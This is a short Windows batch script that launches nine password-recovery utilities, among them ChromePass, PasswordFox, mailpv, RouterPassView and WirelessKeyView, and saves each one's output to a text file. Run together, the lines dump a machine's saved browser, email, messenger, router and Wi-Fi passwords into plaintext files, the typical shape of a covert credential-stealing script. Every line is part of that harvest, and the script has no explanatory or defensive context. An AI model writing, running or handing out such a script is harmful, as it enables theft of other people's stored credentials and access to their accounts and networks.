start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext IEPass.txt
start mailpv.exe /stext MailPass.txt
start mspass.exe /stext MessengerPass.txt
start OperaPassView.exe /stext OperaPass.txt
start PasswordFox.exe /stext FirefoxPass.txt
start RouterPassView.exe /stext RouterPass.txt
start WebBrowserPassView.exe /stext WebBrowserPass.txt
start WirelessKeyView.exe /stext WirelessKey.txt
